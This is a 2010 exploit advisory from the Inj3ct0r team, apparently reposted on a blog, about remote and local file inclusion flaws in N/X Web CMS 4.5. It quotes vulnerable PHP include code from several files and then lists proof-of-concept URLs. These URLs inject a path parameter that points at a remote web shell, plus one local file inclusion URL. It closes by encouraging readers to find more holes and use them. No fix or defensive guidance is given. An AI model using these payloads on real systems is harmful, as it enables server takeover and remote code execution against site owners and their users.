2010/04/19

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability




====================================================
N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Work If: magic_quotes_gpc & magic_quotes_runtime Disable
Download: http://sourceforge.net/projects/nxwcms/files/0.%20N_X%20WCMS%204.5%20System/4.5%20Release%201/nx45.zip/download

Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com
Thank`s: r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
sp3x (securityreason) get-well brother
Special To: m4rc0 & LeQhi (thank`s so much brother , respect to you)

Advisories: http://eidelweiss-advisories.blogspot.com/2010/04/nx-web-cms-nx-wcms-45-multiple.html

========================================================================

Description:

N/X 4.0 is a powerful content management system for the web.
N/X CMS is focused on delivering content in many powerful ways.
Its functions and content-types can be extended with the plugin-interface and a very very powerful API.

========================================================================

-=[ VULN C0de ]=-

**************************************************
[-] nx_path/www/text.php
**************************************************

require_once "nxheader.inc.php";
include $cds->path."inc/header.php";

// Start of individual template
echo $cds->content->get("Headline");
br();
echo $cds->content->get("Body");


include $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article.php
**************************************************

require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php";

// get the id of the article from the request
// do type validation

echo $cds->cluster->draw($article);
br();
br();

// link back to the page where the article was called
echo $cds->content->get("Backlink Title");

require_once $cds->path."inc/footer.php";
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/article_overview.php
**************************************************
require_once "nxheader.inc.php";
require_once $cds->path."inc/header.php"; // line 3

*****

require_once $cds->path."inc/footer.php"; // line 42
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/sitemap.php
**************************************************

require_once "nxheader.inc.php";
include $cds->path."inc/header.php"; // line 3

*****

include $cds->path."inc/footer.php"; // line 56
require_once "nxfooter.inc.php";
?>

**************************************************
[-] nx_path/www/pagelayout.inc.php
**************************************************

**************************************************
[-] nx_path/www/nxheader.inc.php
**************************************************

/*
* Include this file in your page-templates
*/
if (isset($c["path"])) {
require_once $c["path"]."config.inc.php";
} else {
require_once "../cms/config.inc.php";
}
include_once $c["path"]."api/cds/track_exit_pages.php";
require_once $c["path"]."api/cds/lib.inc.php";

*****

if ($c["pagetracking"] && ! $c["usewebbug"]) {
include_once $c["path"].'modules/stats/phpOpenTracker.php'; // line 31
@phpOpenTracker::log(array('document' => $page));
}
require_once $c["path"]."ext/jpcache/jpcache.php"; // line 34

**************************************************
[-] nx_path/cms/api/xml/lib.inc.php
**************************************************
require_once $c["path"] . "api/xml/xpath.class.php";
require_once $c["path"] . "api/xml/meta.php";
require_once $c["path"] . "api/xml/plugin.php";
require_once $c["path"] . "api/xml/cluster_template.php";
require_once $c["path"] . "api/xml/cluster.php";
require_once $c["path"] . "api/xml/sitepage_master.php";
require_once $c["path"] . "api/xml/syndication.php";
require_once $c["path"] . "api/xml/xmlapi_prepare.php";
?>

**************************************************
[-] nx_path/cms/api/parser/lib.inc.php
**************************************************
require_once $c["path"] . "api/parser/nxparser.php";
require_once $c["path"] . "api/parser/class.filemanipulation.php";
require_once $c["path"] . "api/parser/class.mso2003.php";
require_once $c["path"] . "api/parser/class.openoffice.php";
require_once $c["path"] . "api/parser/nx2html.php";
require_once $c["path"] . "api/parser/html2nx.php";
require_once $c["path"] . "api/parser/launch_text.php";
require_once $c["path"] . "api/parser/importhtml.php";
require_once $c["path"] . "api/parser/importtext.php";
?>

**************************************************
[-] nx_path/cms/api/cms/lib.inc.php
**************************************************
require_once $c["path"] . "api/cms/cache.php";
require_once $c["path"] . "api/cms/journal.php";
require_once $c["path"] . "api/cms/launch.php";
require_once $c["path"] . "api/cms/mass_operations.php";
require_once $c["path"] . "api/cms/oiddictionary.php";
require_once $c["path"] . "api/cms/paths.php";
require_once $c["path"] . "api/cms/plugin.php";
require_once $c["path"] . "api/cms/image.php";
require_once $c["path"] . "api/cms/sitepages.php";
require_once $c["path"] . "api/cms/sitepage_master.php";
require_once $c["path"] . "api/cms/synchronize.php";
require_once $c["path"] . "api/cms/cdsinformation.php";
require_once $c["path"] . "api/cms/acl/lib.inc.php";
require_once $c["path"] . "api/cms/log.php";
require_once $c["path"] . "api/cms/meta.php";
require_once $c["path"] . "api/cms/cluster_template.php";
require_once $c["path"] . "api/cms/cluster.php";
require_once $c["path"] . "api/cms/channel.php";
require_once $c["path"] . "api/cms/design.class.php";
require_once $c["path"] . "api/cms/designclasses.php"
?>
========================================================================

-=[ P0C RFI ]=-

http://127.0.0.1/[NX_PATH]/www/text.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/article_overview.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/sitemap.php?path= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/pagelayout.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/xml/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/parser/lib.inc.php?c[path]= [inj3ct0r sh3ll]
http://127.0.0.1/[NX_PATH]/cms/api/cms/lib.inc.php?c[path]= [inj3ct0r sh3ll]

etc , etc ,etc


-=[ P0C LFI ]=-

http://127.0.0.1/[NX_PATH]/www/nxheader.inc.php?page= [LFI]

etc , etc , etc,

[*] So many vulnerability here , use your skill and play your imagination [*]
[*] vuln in NX_path/wwwdev Directory i thing same with vuln in NX_path/www that`s why i don`t put here [*]

=========================| -=[ E0F ]=- |=================================

No comments:

Post a Comment